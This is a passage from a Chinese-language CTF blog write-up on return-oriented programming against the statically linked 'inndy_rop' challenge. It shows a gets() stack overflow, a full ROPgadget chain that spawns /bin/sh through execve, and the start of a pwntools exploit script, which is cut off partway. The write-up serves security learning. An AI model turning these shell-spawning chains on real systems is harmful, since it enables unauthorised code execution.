<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/fontawesome.min.css" rel="stylesheet">
<link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/brands.min.css" rel="stylesheet">
<link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/solid.min.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  

  
  <title>Statically Linked | Fight for the good in your heart.</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <link rel="preload" href="/css/fonts/Roboto-Regular.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/Roboto-Bold.ttf" as="font" type="font/ttf" crossorigin="anonymous">

  <meta name="description" content="通过file指令可以看到程序编译的链接状态，在知道程序可以通过ROP来打的情况下，根据statically linked和dynamically linked两种链接方式来构造对应的ropchain和对应不同的攻击思路 dynamically linked 如果程序是动态链接的话，泄露程序函数的真实地址后拿到libc基址去得到例如system和&#x2F;bin&#x2F;sh的地址，这里不再赘述 staticall">
<meta property="og:type" content="article">
<meta property="og:title" content="Statically Linked">
<meta property="og:url" content="http://mykonos-x.github.io/2022/10/01/Statically-Linked/index.html">
<meta property="og:site_name" content="Fight for the good in your heart.">
<meta property="og:description" content="通过file指令可以看到程序编译的链接状态，在知道程序可以通过ROP来打的情况下，根据statically linked和dynamically linked两种链接方式来构造对应的ropchain和对应不同的攻击思路 dynamically linked 如果程序是动态链接的话，泄露程序函数的真实地址后拿到libc基址去得到例如system和&#x2F;bin&#x2F;sh的地址，这里不再赘述 staticall">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-09-30T16:08:00.000Z">
<meta property="article:modified_time" content="2023-09-05T17:15:05.489Z">
<meta property="article:author" content="RST">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Fight for the good in your heart." type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/icon.svg">
  
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/bg.jpg" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="  ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>Fight for the good in your heart. </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="light-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M438.5-829.913v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-829.913Zm0 747.826v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-82.087ZM877.913-438.5h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537t29.476-12.174h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T877.913-438.5Zm-747.826 0h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T82.087-521.5h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T130.087-438.5Zm660.174-290.87-34.239 32q-12.913 12.674-29.565 12.174-16.653-.5-29.327-13.174-12.674-12.673-12.554-28.826.12-16.152 12.794-28.826l33-35q12.913-12.674 30.454-12.674t30.163 12.847q12.709 12.846 12.328 30.826-.38 17.98-13.054 30.653ZM262.63-203.978l-32 34q-12.913 12.674-30.454 12.674t-30.163-12.847q-12.709-12.846-12.328-30.826.38-17.98 13.054-30.653l33.239-31q12.913-12.674 29.565-12.174 16.653.5 29.327 13.174 12.674 12.673 12.554 28.826-.12 16.152-12.794 28.826Zm466.74 33.239-32-33.239q-12.674-12.913-12.174-29.565.5-16.653 13.174-29.327 12.673-12.674 28.826-13.054 16.152-.38 28.826 12.294l35 33q12.674 12.913 12.674 30.454t-12.847 30.163q-12.846 12.709-30.826 12.328-17.98-.38-30.653-13.054ZM203.978-697.37l-34-33q-12.674-12.913-13.174-29.945-.5-17.033 12.174-29.707t31.326-13.293q18.653-.62 31.326 13.054l32 34.239q11.674 12.913 11.174 29.565-.5 16.653-13.174 29.327-12.673 12.674-28.826 12.554-16.152-.12-28.826-12.794ZM480-240q-100 0-170-70t-70-170q0-100 70-170t170-70q100 0 170 70t70 170q0 100-70 170t-170 70Zm-.247-82q65.703 0 111.475-46.272Q637-414.544 637-480.247t-45.525-111.228Q545.95-637 480.247-637t-111.475 45.525Q323-545.95 323-480.247t45.525 111.975Q414.05-322 479.753-322ZM481-481Z"/></svg></span>
      <span class="dark-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M480.239-116.413q-152.63 0-258.228-105.478Q116.413-327.37 116.413-480q0-130.935 77.739-227.435t206.304-125.043q43.022-9.631 63.87 10.869t3.478 62.805q-8.891 22.043-14.315 44.463-5.424 22.42-5.424 46.689 0 91.694 64.326 155.879 64.325 64.186 156.218 64.186 24.369 0 46.978-4.946 22.609-4.945 44.413-14.076 42.826-17.369 62.967 1.142 20.142 18.511 10.511 61.054Q807.174-280 712.63-198.206q-94.543 81.793-232.391 81.793Zm0-95q79.783 0 143.337-40.217 63.554-40.218 95.793-108.283-15.608 4.044-31.097 5.326-15.49 1.283-31.859.805-123.706-4.066-210.777-90.539-87.071-86.473-91.614-212.092-.24-16.369.923-31.978 1.164-15.609 5.446-30.978-67.826 32.478-108.282 96.152Q211.652-559.543 211.652-480q0 111.929 78.329 190.258 78.329 78.329 190.258 78.329ZM466.13-465.891Z"/></svg></span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M198-120q-25.846 0-44.23-18.384-18.384-18.385-18.384-44.23 0-25.846 18.384-44.23 18.384-18.385 44.23-18.385 25.846 0 44.23 18.385 18.384 18.384 18.384 44.23 0 25.845-18.384 44.23Q223.846-120 198-120Zm538.385 0q-18.846 0-32.923-13.769-14.076-13.769-15.922-33.23-8.692-100.616-51.077-188.654-42.385-88.039-109.885-155.539-67.5-67.501-155.539-109.885Q283-663.462 182.385-672.154q-19.461-1.846-33.23-16.23-13.769-14.385-13.769-33.846t14.076-32.922q14.077-13.461 32.923-12.23 120.076 8.692 226.038 58.768 105.961 50.077 185.73 129.846 79.769 79.769 129.846 185.731 50.077 105.961 58.769 226.038 1.231 18.846-12.538 32.922Q756.461-120 736.385-120Zm-252 0q-18.231 0-32.423-13.461t-18.653-33.538Q418.155-264.23 348.886-333.5q-69.27-69.27-166.501-84.423-20.077-4.462-33.538-18.961-13.461-14.5-13.461-33.346 0-19.076 13.884-33.23 13.884-14.153 33.115-10.922 136.769 15.384 234.384 112.999 97.615 97.615 112.999 234.384 3.231 19.23-10.538 33.115Q505.461-120 484.385-120Z"/></svg>
      </a>
    
    <div id="nav-menu-btn" class="nav-icon">
      <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M177.37-252.282q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Zm0-186.218q-17.453 0-29.477-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T177.37-521.5h605.26q17.453 0 29.477 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T782.63-438.5H177.37Zm0-186.217q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Z"/></svg>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=/avatar-green.png></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">RST </div>
      <div class="dot"></div>
      <div class="subtitle">Try harder </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/Mykonos-x" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Gin/" rel="tag">Gin</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Solutions/" rel="tag">Solutions</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/android-development/" rel="tag">android development</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/crypto/" rel="tag">crypto</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/dsa/" rel="tag">dsa</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/exam/" rel="tag">exam</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/kernel/" rel="tag">kernel</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/misc/" rel="tag">misc</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/openEuler/" rel="tag">openEuler</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/reverse/" rel="tag">reverse</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/rsa/" rel="tag">rsa</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/scripts/" rel="tag">scripts</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/solutions/" rel="tag">solutions</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/write-up/" rel="tag">write-up</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%9D%82%E8%B0%88/" rel="tag">杂谈</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Archives</h3>
      
      
        <a class="archive-link" href="/archives/2024/04 ">
          April 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/03 ">
          March 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          February 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/12 ">
          December 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          November 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          October 2023 
          <div class="archive-count">9 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          September 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/12 ">
          December 2022 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/11 ">
          November 2022 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/10 ">
          October 2022 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/09 ">
          September 2022 
          <div class="archive-count">5 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/08 ">
          August 2022 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/07 ">
          July 2022 
          <div class="archive-count">4 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/06 ">
          June 2022 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/05 ">
          May 2022 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/03 ">
          March 2022 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/02 ">
          February 2022 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/01 ">
          January 2022 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2021/12 ">
          December 2021 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2021/06 ">
          June 2021 
          <div class="archive-count">2 </div>
        </a>
      
    </div>
  </div>


    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       


<article id="post-Statically-Linked" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        Statically Linked
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2022-09-30T16:08:00.000Z" itemprop="datePublished">2022-10-01</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    Uncategorized 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            13k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <p>通过<code>file</code>指令可以看到程序编译的链接状态，在知道程序可以通过ROP来打的情况下，根据<code>statically linked</code>和<code>dynamically linked</code>两种链接方式来构造对应的ropchain和对应不同的攻击思路</p>
<h4><span id="dynamically-linked">dynamically linked</span></h4>
<p>如果程序是动态链接的话，泄露程序函数的真实地址后拿到libc基址去得到例如<code>system</code>和<code>/bin/sh</code>的地址，这里不再赘述</p>
<h4><span id="statically-linked">statically linked</span></h4>
<p>如果程序是静态链接，相对与动态链接就没有那么麻烦了，有的程序我们可以通过<code>ROPgadget</code>这个工具来帮助我们构造我们的ropchain</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">ROPgadget <span class="token parameter variable">--binary</span> 程序名 <span class="token parameter variable">--ropchain</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h5><span id="example-inndyrop">Example-inndyrop</span></h5>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">m1nus@ubuntu:~/elf/buu/inndy_rop$ <span class="token function">file</span> inndy_rop 
inndy_rop: ELF <span class="token number">32</span>-bit LSB executable, Intel <span class="token number">80386</span>, version <span class="token number">1</span> <span class="token punctuation">(</span>GNU/Linux<span class="token punctuation">)</span>, statically linked, <span class="token keyword">for</span> GNU/Linux <span class="token number">2.6</span>.32, BuildID<span class="token punctuation">[</span>sha1<span class="token punctuation">]</span><span class="token operator">=</span>e9ed96cd1a8ea3af86b7b73048c909236d570d9e, not stripped<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>程序运行后接收一次用户输入就结束</p>
<h6><span id="main">main()</span></h6>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token comment">// positive sp value has been detected, the output may be wrong!</span>
<span class="token keyword">int</span> __cdecl <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>envp<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token function">overflow</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>只有一个overflow()函数</p>
<h6><span id="overflow">overflow()</span></h6>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">overflow</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">char</span> v1<span class="token punctuation">[</span><span class="token number">12</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [esp+Ch] [ebp-Ch] BYREF</span>

  <span class="token keyword">return</span> <span class="token function">gets</span><span class="token punctuation">(</span>v1<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>overflow()函数，通过<code>gets()</code>来接收用户输入，没有限制用户输入长度，此处stack overflow</p>
<p>（通过IDA进行反编译的时候会发现程序里面函数比较多比较乱，这是因为程序是<code>statically linked</code>，由于没有调用动态链接库里的函数，所以全部的函数都靠自己实现）</p>
<p>既然是静态链接我们直接上ROPgadget</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#ROPgadget --binary inndy_rop --ropchain</span>

<span class="token keyword">from</span> struct <span class="token keyword">import</span> pack

<span class="token comment"># Padding goes here</span>
p <span class="token operator">=</span> <span class="token string">b''</span>

p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># @ .data</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080b8016</span><span class="token punctuation">)</span> <span class="token comment"># pop eax ; ret</span>
p <span class="token operator">+=</span> <span class="token string">b'/bin'</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0805466b</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea064</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 4</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080b8016</span><span class="token punctuation">)</span> <span class="token comment"># pop eax ; ret</span>
p <span class="token operator">+=</span> <span class="token string">b'//sh'</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0805466b</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080492d3</span><span class="token punctuation">)</span> <span class="token comment"># xor eax, eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0805466b</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080481c9</span><span class="token punctuation">)</span> <span class="token comment"># pop ebx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># @ .data</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080de769</span><span class="token punctuation">)</span> <span class="token comment"># pop ecx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea068</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 8</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080492d3</span><span class="token punctuation">)</span> <span class="token comment"># xor eax, eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0807a66f</span><span class="token punctuation">)</span> <span class="token comment"># inc eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806c943</span><span class="token punctuation">)</span> <span class="token comment"># int 0x80</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>以上就是我们通过ROPgadget构造出的ropchain，前面加上覆盖函数返回地址的padding即可</p>
<h6><span id="exp">exp</span></h6>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> struct <span class="token keyword">import</span> pack
context<span class="token punctuation">(</span>os <span class="token operator">=</span> <span class="token string">"linux"</span> <span class="token punctuation">,</span> arch <span class="token operator">=</span> <span class="token string">'i386'</span> <span class="token punctuation">,</span> log_level <span class="token operator">=</span> <span class="token string">'debug'</span><span class="token punctuation">)</span>
elf<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">"inndy_rop"</span><span class="token punctuation">)</span>
host<span class="token operator">=</span><span class="token string">"node4.buuoj.cn"</span>
port<span class="token operator">=</span><span class="token number">26277</span>
local<span class="token operator">=</span><span class="token builtin">int</span><span class="token punctuation">(</span><span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"0 for remote , 1 for local:\t"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
io <span class="token operator">=</span> process<span class="token punctuation">(</span>elf<span class="token punctuation">.</span>path<span class="token punctuation">)</span> <span class="token keyword">if</span> local<span class="token operator">==</span><span class="token number">1</span> <span class="token keyword">else</span> remote<span class="token punctuation">(</span>host<span class="token punctuation">,</span>port<span class="token punctuation">)</span>
<span class="token comment"># Padding goes here</span>
p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token punctuation">(</span><span class="token number">0xc</span> <span class="token operator">+</span> <span class="token number">0x4</span><span class="token punctuation">)</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea060</span><span class="token punctuation">)</span> <span class="token comment"># @ .data</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080b8016</span><span class="token punctuation">)</span> <span class="token comment"># pop eax ; ret</span>
p <span class="token operator">+=</span> <span class="token string">b'/bin'</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0805466b</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0806ecda</span><span class="token punctuation">)</span> <span class="token comment"># pop edx ; ret</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080ea064</span><span class="token punctuation">)</span> <span class="token comment"># @ .data + 4</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x080b8016</span><span class="token punctuation">)</span> <span class="token comment"># pop eax ; ret</span>
p <span class="token operator">+=</span> <span class="token string">b'//sh'</span>
p <span class="token operator">+=</span> pack<span class="token punctuation">(</span><span class="token string">'&lt;I'</span><span class="token punctuation">,</span> <span class="token number">0x0805466b</span><span class="token punctuation">)</span> <span class="token comment"># mov dword ptr [edx], eax ; ret</span>
